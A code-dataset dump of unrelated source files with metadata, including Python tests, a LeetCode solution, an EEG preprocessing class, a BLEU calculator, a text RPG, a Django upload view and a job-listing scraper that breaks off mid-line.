'female',\n 'id': '100008124789809',\n 'last_name': 'Poster',\n 'link': 'https://www.facebook.com/profile.php?id=100008124789809',\n 'locale': 'en_US',\n 'name': 'Mnt Poster',\n 'picture': {'data': {'is_silhouette': True,\n 'url': 'https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xpf1/t1.0-1/c15.0.50.50/p50x50/1509246_10150002137498325_1584423246374331045_n.jpg'}},\n 'updated_time': '2014-04-04T12:11:53+0000'})\n self.assertEqual(created_post.content, 'Testing post-reply pair')\n self.assertTrue(str(srv_channel.inbound_channel.id) in created_post.channel_assignments)\n self.assertEqual(created_post.channel_assignments[str(srv_channel.inbound_channel.id)], 'highlighted')\n\n self.fb_bot.post_received(json.dumps(reply_data))\n\n for idx in xrange(MAX_TIMEOUT):\n time.sleep(1)\n if not (self.fb_bot.is_busy() or self.fb_bot.is_blocked()):\n break\n else:\n self.fail(\"Post processing did not finish after waiting %s seconds\" % MAX_TIMEOUT)\n\n self.assertEqual(FacebookPost.objects.count(), 2)\n created_reply = [p for p in FacebookPost.objects() if p.content == 'Thanks for reaching out. Testing scenario'][0]\n self.assertTrue(str(srv_channel.outbound_channel.id) in created_reply.channel_assignments)\n self.assertTrue(isinstance(created_reply.user_profile, UserProfile))\n self.assertDictEqual(created_reply.user_profile.platform_data,\n {'first_name': 'Mnt',\n 'gender': 'female',\n 'id': '100008145211355',\n 'last_name': 'Poster',\n 'link': 'https://www.facebook.com/profile.php?id=100008145211355',\n 'locale': 'en_US',\n 'name': 'Mnt Creator',\n 'picture': {'data': {'is_silhouette': True,\n 'url': 'https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xpf1/t1.0-1/c15.0.50.50/p50x50/1509246_10150002137498325_1584423246374331045_n.jpg'}},\n 'updated_time': '2014-04-04T12:11:53+0000'})\n\n for idx in xrange(MAX_TIMEOUT * 4):\n created_post.reload()\n if created_post.channel_assignments[str(srv_channel.inbound_channel.id)] == 'replied':\n break\n else:\n self.fail(\"Inbound post was never switched to replied status\")\n\n self.fb_bot.stop()\n\n for idx in xrange(MAX_TIMEOUT * 4):\n time.sleep(1)\n if not self.fb_bot.isAlive():\n break\n else:\n self.fail(\"Bot never stopped after waiting %s seconds.\" % (4 * MAX_TIMEOUT))\n\n","sub_path":"tests/social/test_facebook_bot.py","file_name":"test_facebook_bot.py","file_ext":"py","file_size_in_byte":23457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"413530526","text":"\"\"\"\n1338. Reduce Array Size to The Half\nMedium\n\nGiven an array arr. You can choose a set of integers and remove all the occurrences of these integers in the array.\n\nReturn the minimum size of the set so that at least half of the integers of the array are removed.\n\nExample 1:\n\nInput: arr = [3,3,3,3,5,5,5,2,2,7]\nOutput: 2\nExplanation: Choosing {3,7} will make the new array [5,5,5,2,2] which has size 5 (i.e equal to half of the size of the old array).\nPossible sets of size 2 are {3,5},{3,2},{5,2}.\nChoosing set {2,7} is not possible as it will make the new array [3,3,3,3,5,5,5] which has size greater than half of the size of the old array.\n\nExample 2:\n\nInput: arr = [7,7,7,7,7,7]\nOutput: 1\nExplanation: The only possible set you can choose is {7}. This will make the new array empty.\n\nExample 3:\n\nInput: arr = [1,9]\nOutput: 1\n\nExample 4:\n\nInput: arr = [1000,1000,3,7]\nOutput: 1\n\nExample 5:\n\nInput: arr = [1,2,3,4,5,6,7,8,9,10]\nOutput: 5\n \nConstraints:\n\n1 <= arr.length <= 10^5\narr.length is even.\n1 <= arr[i] <= 10^5\n\"\"\"\n\nfrom typing import List\nfrom collections import Counter\n\n###############################################################################\n\"\"\"\nSolution: greedy\n\nHave to return minimum set size, so want to include the most frequent\nvalues first. Use collections.Counter(arr).values() and reverse sort.\nThen count how many (unique) values need to be added together.\n\"\"\"\nclass Solution:\n def minSetSize(self, arr: List[int]) -> int:\n # want to be able to remove at least this many elts\n threshold = (len(arr) + 1) // 2 \n \n counts = list(Counter(arr).values())\n counts.sort(reverse=True)\n n_counts = len(counts)\n \n i = 0\n count = 0\n \n while i < n_counts and count < threshold:\n count += counts[i]\n i += 1\n \n return i\n\n###############################################################################\n\nif __name__ == \"__main__\":\n def test(arr, comment=None):\n res = s.minSetSize(arr)\n \n print(\"=\"*80)\n if comment:\n print(comment)\n \n print(f\"\\n{arr}\")\n print(f\"\\nres = {res}\")\n\n\n s = Solution()\n\n comment = \"LC ex1; answer = 2\"\n arr = [3,3,3,3,5,5,5,2,2,7]\n test(arr, comment)\n\n comment = \"LC ex2; answer = 1\"\n arr = [7,7,7,7,7,7]\n test(arr, comment)\n\n comment = \"LC ex3, answer = 1\"\n arr = [1,9]\n test(arr, comment)\n\n comment = \"LC ex4, answer = 1\"\n arr = [1000,1000,3,7]\n test(arr, comment)\n\n comment = \"LC ex5, answer = 5\"\n arr = [1,2,3,4,5,6,7,8,9,10]\n test(arr, comment)\n\n comment = \"LC test case; answer = 5\"\n arr = [9,77,63,22,92,9,14,54,8,38,18,19,38,68,58,19]\n test(arr, comment)\n","sub_path":"array/1338_reduce_array_size_to_half.py","file_name":"1338_reduce_array_size_to_half.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"442713558","text":"from ussociety.MatFile import *\nfrom ussociety.Subject import *\nfrom SignalUtils import *\nfrom Setting import *\nimport glob\n\nclass Processor:\n def __init__(self):\n self.setting = Setting()\n self.matFileInstance = MatFile()\n self.subjectInstance = Subject()\n self.signalUtilInstance = SignalUtils()\n self.trainDir = \"/home/xiaobin/Disk/trainData\"\n #self.testDir = \"/home/xiaobin/Disk/testData\"\n self.subjectName = \"\"\n\n def processDataPerMatFile(self,dataFile,trainOrTest=\"train\"):\n self.matFileInstance.readMat(dataFile)\n self.matFileInstance.name = dataFile\n self.matFileInstance.samplingRate = 400\n self.matFileInstance.data = self.signalUtilInstance.resample(self.matFileInstance.data, 400)\n self.matFileInstance.data = self.signalUtilInstance.butterWorthBandpassFilter(self.matFileInstance.data, band=[0.1, 180], frequency = 400)\n #this is for comparison solution\n #self.matFileInstance.data = self.signalUtilInstance.butterWorthBandpassFilter(self.matFileInstance.data, band=[0.5, 128], frequency = 256)\n\n matPerSlot = self.matFileInstance.getDataListPerTimeSlot(timeslot = self.matFileInstance.timeLength)\n size = matPerSlot.shape\n size = size[0]\n\n #self.matFileInstance.data = self.signalUtilInstance.resample(self.matFileInstance.data, 400)\n #self.matFileInstance.data = self.signalUtilInstance.butterWorthBandpassFilter(matPerSlot[0].data, band=[0.1, 180], frequency = 400)\n\n #fft\n #matFileInstance.data = util.fft(matFileInstance.data)\n #self.matFileInstance.data = self.signalUtilInstance.daubWavelet(self.matFileInstance.data)\n\n #self.matFileInstance.data = self.signalUtilInstance.resample(self.matFileInstance.data, 400)\n sizex,sizey = matPerSlot[0].data.shape\n\n matBagX = numpy.zeros((size,sizex,sizey))\n matBagY = []\n\n matBagX[0, :, :] = matPerSlot[0].data\n\n if trainOrTest == \"train\":\n matBagY.append(self.matFileInstance.getSeizureOnsetLabel())\n elif trainOrTest == \"test\":\n matBagY.append(self.matFileInstance.name.split(\"/\")[-1])\n\n for i in xrange(1,size):\n #self.matFileInstance.data = self.signalUtilInstance.resample(self.matFileInstance.data, 400)\n #self.matFileInstance.data = self.signalUtilInstance.butterWorthBandpassFilter(matPerSlot[i].data, band=[0.1, 180], frequency = 400)\n #self.matFileInstance.data = self.signalUtilInstance.daubWavelet(self.matFileInstance.data)\n matBagX[i, :, :] = matPerSlot[i].data\n if trainOrTest == \"train\":\n #matBagY[i, :, :] = self.matFileInstance.getSeizureOnsetLabel()\n matBagY.append(self.matFileInstance.getSeizureOnsetLabel())\n elif trainOrTest == \"test\":\n matBagY.append(self.matFileInstance.name.split(\"/\")[-1])\n\n return matBagX, matBagY\n\n def processDataPerSubject(self,subject, splitNum = 10, sequence = 0, trainOrTest = \"train\"):\n dataList = None\n if trainOrTest == \"train\":\n dataList = self.subjectInstance.getTrainFileList(subject)\n elif trainOrTest == \"test\":\n dataList = self.subjectInstance.getTestFileList(subject)\n else:\n raise \"trainOrTest error\"\n\n if subject.find(\"Dog\") != -1:\n index = subject.find(\"Dog\")\n self.subjectName = subject[index : index + len(\"Dog\") + 2]\n else:\n index = subject.find(\"Patient\")\n self.subjectName = subject[index : index + len(\"Patient\") + 2 ]\n amount = None\n if len(dataList) % splitNum == 0:\n amount = len(dataList) / splitNum\n else:\n amount = len(dataList) / splitNum + 1\n for i in xrange(splitNum):\n if i == sequence:\n return self.processData(dataList[i * amount: (i + 1)*amount],sequence = sequence, trainOrTest = trainOrTest)\n\n def processData(self,trainList,sequence = 0,trainOrTest = \"train\"):\n dim0 = len(trainList)\n if dim0 == 0:\n raise \"trainList is empty\"\n X,Y = self.processDataPerMatFile(trainList[0],trainOrTest = trainOrTest)\n xdim0,xdim1,xdim2 = X.shape\n dim0 = dim0 * xdim0\n\n trainDataX = numpy.zeros((dim0, xdim1, xdim2))\n trainDataY = []\n trainDataX[0:xdim0,:,:] = X\n trainDataY += Y\n #if trainOrTest == \"train\":\n # #trainDataY = numpy.zeros_like(trainDataX)\n # trainDataX[0:xdim0,:,:] = X\n # trainDataY[0:xdim0,:,:] = Y\n #elif trainOrTest == \"test\":\n # trainDataY = []\n # trainDataX[0:xdim0,:,:] = X\n # trainDataY += Y\n for i in xrange(1,len(trainList)):\n tempX, tempY = self.processDataPerMatFile(trainList[i],trainOrTest = trainOrTest)\n trainDataX[i * xdim0: (i + 1) * xdim0, :, :] = tempX\n #if trainOrTest == \"train\":\n # trainDataY[i * xdim0: (i + 1) * xdim0,:,:] = tempY\n #elif trainOrTest == \"test\":\n trainDataY += tempY\n #self.saveDataToDisk(trainDataX, trainDataY, sequence, trainOrTest)\n\n return trainDataX,trainDataY\n\n def saveDataToDisk(self,trainDataX,trainDataY,sequence = 0, trainOrTest = \"train\"):\n\n if trainOrTest == \"train\":\n numpy.save(self.trainDir + \"/\" + self.subjectName + \"/trainX_\" + str(sequence), trainDataX)\n numpy.save(self.trainDir + \"/\" + self.subjectName + \"/trainY_\" + str(sequence), trainDataY)\n elif trainOrTest == \"test\":\n numpy.save(self.trainDir + \"/\" + self.subjectName + \"/testX_\" + str(sequence), trainDataX)\n numpy.save(self.trainDir + \"/\" + self.subjectName + \"/testY_\" + str(sequence), numpy.array(trainDataY))\n else:\n raise \"save error : train or test\"\n #scipy.io.savemat(self.trainDir + \"/trainX_\" + timeStr,{\"data\":trainDataX})\n #scipy.io.savemat(self.trainDir + \"/trainY_\" + timeStr,{\"data\":trainDataY})\n #del trainDataX\n #del trainDataY\n\n def loadDataFromDisk(self,sequence = 0, trainOrTest = \"train\"):\n trainX = None\n trainY = None\n #files = os.listdir(self.trainDir + \"/\" + self.subjectName)\n files = glob.glob(self.trainDir + \"/\" + self.subjectName + \"/*.npy\")\n files = sorted(files)\n count = 0\n for f in files:\n if trainOrTest == \"train\":\n if \"trainX\" in f and count == sequence:\n #trainX = numpy.load(self.trainDir + \"/\" + self.subjectName + \"/\" + f)\n trainX = numpy.load(f)\n #trainX = scipy.io.loadmat(f)[\"data\"]\n f = f.replace(\"trainX\",\"trainY\")\n #trainY = numpy.load(self.trainDir + \"/\" + self.subjectName + \"/\" + f)\n trainY = numpy.load(f)\n #trainY = scipy.io.loadmat(f)[\"data\"]\n count += count\n return trainX, trainY\n elif trainOrTest == \"test\":\n if \"testX\" in f and count == sequence:\n testX = numpy.load(f)\n f = f.replace(\"testX\",\"testY\")\n testY = numpy.load(f)\n count += count\n return testX, testY\n\n return None\n def rebalanceData(self,x, y,mode=\"SMOTE\", trainOrTest = \"train\", rebalanceInstance = None):\n if mode == \"SMOTE\":\n if trainOrTest == \"train\":\n verbose = False\n ratio = float(numpy.count_nonzero( y == 1)) / float(numpy.count_nonzero(y == 0))\n smoteInstance = SMOTE(ratio = ratio, verbose = verbose,kind = \"regular\")\n smoteDataX, smoteDataY = smote.fit_transform(x, y)\n\n return smoteInstance, smoteDataX, smoteDataY\n elif trainOrTest == \"test\":\n if rebalanceInstance is None:\n raise \"rebalanceInstance can not be none when the data is for testing\"\n else:\n smoteDataX = smoteInstance.transform(x)\n return smoteDataX\n\n","sub_path":"preprocessing/Processor.py","file_name":"Processor.py","file_ext":"py","file_size_in_byte":8191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"52658869","text":"\"\"\"\n@Project :20180821\n@Time :2018/8/21 10:29\n@Author :Zhenxian\n@File :查票.py\n@Software :PyCharm\n\"\"\"\nfrom multiprocessing import Lock, Process\nimport time\nimport random\n\n\ndef check(b):\n with open('info') as f:\n con = f.read()\n print(\"第%s个人查到余票还剩%s张\" % (b, con))\n\n\ndef buy(b, lo):\n lo.acquire()\n with open('info') as f:\n con = int(f.read())\n time.sleep(1)\n if con > 0:\n con -= 1\n print(\"\\033[32m第%s个人买到票,余票剩下%s张\\033[0m\" % (b, con))\n else:\n print(\"\\033[31m第%s个人没买到票,尚无余票\\033[0m\" % b)\n time.sleep(1)\n with open('info', mode='w') as f1:\n f1.write(str(con))\n lo.release()\n\n\nif __name__ == '__main__':\n l = Lock()\n for i in range(100):\n p_ch = Process(target=check, args=(i + 1,))\n p_ch.start()\n for i in range(100):\n p_buy = Process(target=buy, args=(i + 1, l))\n p_buy.start()\n","sub_path":"20180821/查票.py","file_name":"查票.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"43553211","text":"import uuid\nfrom django.http import HttpResponseBadRequest\nfrom rest_framework import generics, permissions\nfrom rest_framework.response import Response\n\nfrom api.efiling import (\n upload_documents\n)\n\n\nclass EfilingDocumentView(generics.GenericAPIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n def post(self, request):\n transaction_id = str(uuid.uuid4())\n if (len(request.FILES) == 0):\n return HttpResponseBadRequest(\"No files uploaded.\")\n universal_id = request.user.universal_id\n result = upload_documents(\n universal_id, transaction_id, request.FILES\n )\n return Response({\"transactionId\": transaction_id, \"result\": result})\n","sub_path":"api/api/views/efiling_document_view.py","file_name":"efiling_document_view.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"359324622","text":"import sys\nimport codecs\nimport glob\nimport math\n\nclass bleu:\n def __init__(self):\n self.reference_files=[]\n self.candidate_file=codecs.open(sys.argv[1],\"r\", \"utf-8\")\n self.candidate=[]\n self.references=[]\n self.best_len=[]\n \n def open_ref_file(self):\n if \".txt\" in sys.argv[2]:\n self.reference_files.append(codecs.open(sys.argv[2],\"r\",\"utf-8\"))\n else:\n for file in glob.glob(sys.argv[2]+\"/*.txt\"):\n self.reference_files.append(codecs.open(file,\"r\",\"utf-8\"))\n\n def read_content(self):\n self.candidate=self.candidate_file.read().split(\"\\n\")\n for files in self.reference_files:\n self.references.append(files.read().split(\"\\n\"))\n\n def generatengram(self,line,n):\n split_lines=line.split()\n word=[]\n i=0\n while (i+n-1)sum(bl.best_len):\n BP=1.0\n else:\n BP=math.exp(1-((sum(bl.best_len)*1.0)/candidate_len)) \n pn=bl.calculate_precision(2)\n if pn != 0:\n log_sum+=wn*math.log(pn)\n else:\n log_sum+=0\n pn=bl.calculate_precision(3)\n if pn != 0:\n log_sum+=wn*math.log(pn)\n else:\n log_sum+=0\n pn=bl.calculate_precision(4)\n if pn != 0:\n log_sum+=wn*math.log(pn)\n else:\n log_sum+=0\n bleu_score=BP*math.exp(log_sum)\n output=open(\"bleu_out.txt\", \"w\")\n output.write(str(bleu_score))\n \nif __name__ == \"__main__\":main()","sub_path":"NLP/Bleu_score_calculator/calculatebleu.py","file_name":"calculatebleu.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"332880187","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\nfrom unittest.mock import MagicMock\n\nfrom io import StringIO\nfrom textwrap import dedent\n\nfrom hevelli.inputsources import InputSource \nfrom hevelli.parser import RecipeParser\nimport hevelli.errors as errors\n\n\n\nclass ErrorMixin:\n \n def test_error(self):\n text = StringIO(self.content)\n def dummy(*args): return MagicMock() \n parser = RecipeParser(\n None, {k:dummy for k in self.keys}) \n with InputSource(text) as inp:\n with self.assertRaises(errors.ParserError) as cm:\n parser.parse(inp)\n\n e = cm.exception\n self.assertIs(e.inputsrc, inp)\n self.assertEqual(e.inputsrc.line_num, self.line_num)\n self.assertEqual(e.inputsrc.line, self.line)\n \n\nclass Unknown(ErrorMixin, unittest.TestCase):\n\n content = \"\"\"\n file bla\n \"\"\"\n\n keys = ['test']\n line_num=2\n line='file bla'\n \nclass KnownAndUnknown(ErrorMixin, unittest.TestCase):\n\n content = \"\"\"\n test foo\n file bla\n \"\"\"\n\n keys = ['test']\n line_num=3\n line='file bla'\n \nclass NoArgs(ErrorMixin, unittest.TestCase):\n\n content = \"\"\"\n test\n file\n \"\"\"\n\n keys = ['test']\n line_num=3\n line='file'\n\n \nclass RecipeMixin:\n \n def test_recipe(self):\n text = StringIO(self.content)\n section_parsers = {k:MagicMock() for k in self.keys}\n world = object()\n parser = RecipeParser(world, section_parsers)\n \n inp = InputSource(text)\n with inp:\n parser.parse(inp)\n\n for key, mock in section_parsers.items():\n self.assertEqual(mock.call_count, self.keys[key])\n mock.assert_called_with(inp, world)\n \n\n \nclass WithEnd(RecipeMixin, unittest.TestCase):\n\n content = \"\"\"\n test\n end\n test\n file\n test\n end\n \"\"\"\n\n keys = {'test':3, 'file':1, 'end':2}\n \n \n","sub_path":"tests/test_recipeparser.py","file_name":"test_recipeparser.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"233259637","text":"#!/usr/bin/env python\nfrom app.model.profile_response import ProfileResponse\n\n\"\"\"\n@author bvanderlaan\n\"\"\"\n\n\nclass TestProfileResponse:\n def test_count_languages(self):\n pr = ProfileResponse(\n 1,\n 2,\n 3,\n [\"Java\", \"java\", \"Python\", \"Ruby\"],\n [\"Java is coffee\", \"Ruby is shiny\", \"Python is slippery\"],\n )\n expected = [{\"java\": 2}, {\"python\": 1}, {\"ruby\": 1}]\n assert expected == pr.get_counts(pr.languages)\n\n def test_count_languages_empty(self):\n pr = ProfileResponse(\n 1, 2, 3, [], [\"Java is coffee\", \"Ruby is shiny\", \"Python is slippery\"]\n )\n expected = []\n assert expected == pr.get_counts(pr.languages)\n\n def test_json_format(self):\n pr = ProfileResponse(\n 1,\n 2,\n 3,\n [\"Java\", \"Python\", \"Ruby\"],\n [\"Java is coffee\", \"Ruby is shiny\", \"Python is slippery\"],\n )\n expected = {\n \"languages\": [{\"java\": 1}, {\"python\": 1}, {\"ruby\": 1}],\n \"repo_topics\": [\n {\"java is coffee\": 1},\n {\"ruby is shiny\": 1},\n {\"python is slippery\": 1},\n ],\n \"total_repos\": {\"forked\": 3, \"original\": 1},\n \"total_watchers\": 2,\n }\n assert expected == pr.json_format()\n\n def test_json_format_empty(self):\n pr = ProfileResponse(0, 0, 0, [], [])\n expected = {\n \"languages\": [],\n \"repo_topics\": [],\n \"total_repos\": {\"forked\": 0, \"original\": 0},\n \"total_watchers\": 0,\n }\n assert expected == pr.json_format()\n","sub_path":"app/model/test/profile_response_test.py","file_name":"profile_response_test.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"423441562","text":"import random\n\n\nclass Character:\n def __init__(self, name, hp, ac, dmg, defense):\n self.name = name\n self.hp = hp\n self.ac = ac\n self.dmg = dmg\n self.defense = defense\n\n def attack(self, opponent):\n roll = random.randint(1, 20)\n print('{} rolled a {}'.format(self.name, roll))\n if roll > opponent.ac and roll < 17:\n print(\"{} delt {} damage to the {}\".format(\n self.name, str(self.dmg - opponent.defense), opponent.name))\n opponent.hp -= (self.dmg - opponent.defense)\n elif roll > opponent.ac and roll >= 17:\n print('{} crits and deals double damage!'.format(self.name))\n opponent.hp -= (self.dmg * 2 - opponent.defense)\n else:\n print('You missed!')\n\n def alive(self):\n return self.hp > 0\n\n def print_status(self):\n print(\"{} has {} hit points\".format(self.name, self.hp))\n\n\nclass Hero(Character):\n def __init__(self, name, hp, ac, dmg, defense, coins):\n super().__init__(name, hp, ac, dmg, defense)\n self.coins = coins\n self.inventory = []\n\n\nclass Monster(Character):\n def __init__(self, name, hp, ac, dmg, defense, bounty):\n super().__init__(name, hp, ac, dmg, defense)\n self.bounty = bounty\n\n\nclass Healing_Potion(object):\n cost = 5\n name = 'healing potion'\n\n def apply(self, hero):\n hero.hp += 2\n print(\"{}'s health increased to {}.\".format(hero.name, hero.hp))\n\n\nclass Defense_Potion(object):\n cost = 5\n name = 'defense potion'\n\n def apply(self, hero):\n hero.defense = 2\n print(\"{}'s will now take 2 less damage from opponents!\".format(\n hero.name))\n\n\nclass Great_Sword(object):\n cost = 10\n name = 'sword'\n\n def apply(self, hero):\n hero.dmg += 2\n print(\"{}'s power increased to {}.\".format(hero.name, hero.dmg))\n\n\nclass Armor(object):\n cost = 10\n name = 'armor'\n\n def apply(self, hero):\n hero.ac += 2\n print(\"{}'s AC has increased to {}!\".format(hero.name, hero.ac))\n\n\nclass Store(object):\n items = [Healing_Potion, Defense_Potion, Great_Sword, Armor]\n\n def do_shopping(self, hero):\n while True:\n print(\"=====================\")\n print(\"Welcome to the store!\")\n print(\"=====================\")\n print(\"You have {} coins.\".format(hero.coins))\n print(\"What would you like to do?\")\n for i in range(len(Store.items)):\n item = Store.items[i]\n print(\"{}. buy {} ({})\".format(i + 1, item.name, item.cost))\n print(\"5. leave\")\n inp = int(input(\"> \"))\n if inp == 1:\n heal = Healing_Potion()\n if hero.coins >= heal.cost:\n heal.apply(hero)\n hero.coins -= heal.cost\n else:\n print(\"You don't have enough coins!\")\n elif inp == 2:\n defense = Defense_Potion()\n if hero.coins >= defense.cost:\n defense.apply(hero)\n hero.coins -= defense.cost\n else:\n print(\"You don't have enough coins!\")\n elif inp == 3:\n sword = Great_Sword()\n if hero.coins >= sword.cost:\n sword.apply(hero)\n hero.coins -= sword.cost\n else:\n print(\"You don't have enough coins!\")\n elif inp == 4:\n armor = Armor()\n if hero.coins >= armor.cost:\n armor.apply(hero)\n hero.coins -= armor.cost\n else:\n print(\"You don't have enough coins!\")\n else:\n print(\"Come again!\")\n cont()\n break\n\n\ndef cont():\n ans = int(\n input(\"\"\"Would you like to: \n1. Continue adventuring\n2. Go to the store\n3. Go home\n> \"\"\"))\n if ans == 1:\n fight()\n elif ans == 2:\n store = Store()\n store.do_shopping(hero)\n return store\n elif ans == 3:\n print(\"Thank you for your help!\")\n quit()\n else:\n print(\"That's not an option\")\n\n\ndef dm_roll():\n roll = random.randint(1, 20)\n\n if roll > 0 and roll <= 10:\n opponent = Monster('Goblin', 9, 10, 2, 0, 1)\n elif roll > 10 and roll <= 16:\n opponent = Monster('Zombie', 13, 12, 3, 0, 3)\n elif roll > 16 and roll <= 19:\n opponent = Monster('Ogre', 15, 15, 5, 0, 5)\n else:\n opponent = Monster('Dragon', 1000000, 20, 10, 0, 100)\n print(\"You have run into a {}!\".format(opponent.name))\n return opponent\n\n\ndef fight():\n opponent = dm_roll()\n while opponent.alive() and hero.alive():\n hero.print_status()\n opponent.print_status()\n print(\"What do you want to do?\")\n print(\"1. Fight {}\".format(opponent.name))\n print(\"2. Do nothing\")\n print(\"3. Flee\")\n print(\"> \", ' ')\n raw_input = input()\n if raw_input == \"1\":\n # Hero attacks opponent\n hero.attack(opponent)\n if opponent.alive() == False:\n print(\"Victory!!!\")\n print(\"You collect the bounty for the {}, which is {} coins.\".\n format(opponent.name, opponent.bounty))\n hero.coins += opponent.bounty\n print(\"You now have {} coins!\".format(hero.coins))\n cont()\n elif raw_input == \"2\":\n pass\n elif raw_input == \"3\":\n print(\"Run awaaaaaaaayyyy\")\n loss = random.randint(1, 5)\n print(\"As you run away you drop {} coins.\".format(loss))\n hero.coins -= loss\n if hero.coins <= 0:\n print(\"You have no more coins\")\n else:\n print(\"You now have {} coins.\".format(hero.coins))\n cont()\n else:\n print(\"Invalid input {}\".format(raw_input))\n\n if opponent.alive():\n # opponent attacks hero\n opponent.attack(hero)\n if hero.alive() == False:\n print(\"You are dead.\")\n\n\ndef main():\n while True:\n spec = input(\"\"\"Welcome, Adventurer! Are your a Fighter, Cleric, Wizard or a Rogue? \n \n Fighter Cleric Wizard Rogue\n --------------------------------------------\n HP 15 15 15 15 \n AC 10 10 10 15\n DMG 10 8 10 8 \n DEF 0 2 0 0\n COINS 15 15 15 20\n \n Your Class: \"\"\").lower()\n if spec == 'fighter':\n hero = Hero('Fighter', 15, 10, 8, 0, 15)\n break\n elif spec == 'cleric':\n hero = Hero('Cleric', 10, 10, 8, 2, 15)\n break\n elif spec == 'wizard':\n hero = Hero('Wizard', 15, 10, 8, 0, 15)\n break\n elif spec == 'rogue':\n hero = Hero('Rogue', 10, 14, 8, 0, 20)\n break\n else:\n print(\"That's not an option!\")\n print(\"\"\"Ah, we sure could use a {}! Thank you for coming to rescue our town. \nThere are many monsters to fight, so let's begin!\"\"\".format(hero.name))\n return hero\n\n\nhero = main()\ncont()\n","sub_path":"rpg_remake.py","file_name":"rpg_remake.py","file_ext":"py","file_size_in_byte":7363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"299965198","text":"import os\nimport shutil\nimport SCons\n\nenv = Environment(ENV=os.environ)\n\noutputName = \"Transition\"\n\ntexName = \"main\"\nbinPath = \"bin/\"\nsrcPath = \"src/\"\ntmpPath = \"tmp/\"\n\nbuildRes = env.PDF(target = tmpPath + texName + \".pdf\", source = srcPath + texName + \".tex\") \nenv.AddPostAction(buildRes, \"cp \" + tmpPath + texName + \".pdf \" + binPath + outputName + \".pdf\") \n","sub_path":"Rapport/Transition/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"57451811","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 16 09:47:44 2017\n\n@author: Administrator\n\"\"\"\nimport requests\nfrom lxml import etree\nimport json\nimport pandas as pd\nimport numpy as np\nfrom pandas import DataFrame,Series\nfrom datetime import datetime\nimport sqlite3\n\nconn = sqlite3.connect('test2.db')\nc = conn.cursor()\n#c.execute('''create table job3\n# (title text,\n# link char(50),\n# category text,\n# num int,\n# city text,\n# time time,\n# jobduties text,\n# jobrequirement text\n# );''')\n#conn.commit()\n\nheader = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',\n 'Accept-Language': 'zh-CN,zh;q=0.8'}\nbaseurl = 'http://hr.tencent.com/'\noffset = 'position.php?&start=0#a'\njoblist = []\n\ndef loadurl(url): \n req = requests.get(url,headers=header)\n body = req.text\n html = etree.HTML(body)\n return html\n\n\ndef findlist(url,meta):\n html = loadurl(url)\n# item = {}\n# \n# item['title']=meta['title']\n# item['link']=meta['link']\n# item['category']=meta['category']\n# item['num']=meta['num']\n# item['city']=meta['city']\n# item['time']=meta['time']\n# item['jobduties'] = html.xpath('//tr[@class=\"c\"][1]/td[@colspan=\"3\"]/ul')[0].xpath('string(.)')\n# item['jobrequirement'] = html.xpath('//tr[@class=\"c\"][2]/td[@colspan=\"3\"]/ul')[0].xpath('string(.)')\n item = []\n jobduties = html.xpath('//tr[@class=\"c\"][1]/td[@colspan=\"3\"]/ul')[0].xpath('string(.)')\n jobrequirement = html.xpath('//tr[@class=\"c\"][2]/td[@colspan=\"3\"]/ul')[0].xpath('string(.)')\n\n# item.append([meta['title'],meta['link'],meta['category'],meta['num'],\n# meta['city'],meta['time'],jobduties,jobrequirement])\n item.append([jobduties,jobrequirement])\n yield item[0]\n\ndef find(baseurl,offset):\n url = baseurl + offset\n html = loadurl(url)\n result1 = html.xpath('//tr[@class=\"even\" or @class=\"odd\"]')\n item = {}\n for i in result1:\n title = i.xpath('./td[1]/a/text()')[0]\n link = baseurl + i.xpath('./td[1]/a/@href')[0]\n if len(i.xpath('./td[2]/text()')) == 0:\n category = ''\n else:\n category = i.xpath('./td[2]/text()')[0]\n num = i.xpath('./td[3]/text()')[0]\n city = i.xpath('./td[4]/text()')[0]\n time = i.xpath('./td[5]/text()')[0]\n \n \n item['title']=title\n item['link']=link\n item['category']=category\n item['num']=num\n item['city']=city\n item['time']=time\n \n for a in findlist(link,meta={'title':title,'category':category,'num':num,\n 'city':city,'time':time,'link':link}):\n print(a[0])\n print('_'*64)\n print(a[1])\n print('*'*64)\n item['jobduties'] = a[0]\n item['jobrequirement'] = a[1]\n yield item\n \n \n \n# if len(html.xpath('//*[@id=\"next\"]/@class')) == 0:\n# offset = html.xpath('//*[@id=\"next\"]/@href')[0]\n# for i in find(baseurl,offset):\n# yield i\n\nif __name__ =='__main__':\n# print(datetime.now())\n# for item in find(baseurl,offset):\n# insertsql = \"insert into job3 values(?,?,?,?,?,?,?,?)\"\n# c.execute(insertsql,(item[0],item[1],item[2],item[3],item[4],item[5],item[6],item[7]))\n# conn.commit()\n# print(datetime.now())\n# sql = 'select * from job3'\n# df = pd.read_sql(sql,conn)\n\n\n with open('joblist.txt','w+',encoding='utf-8') as f:\n print(datetime.now())\n for item in find(baseurl,offset):\n #print(item)\n #b = ' '.join(item[0])\n b = 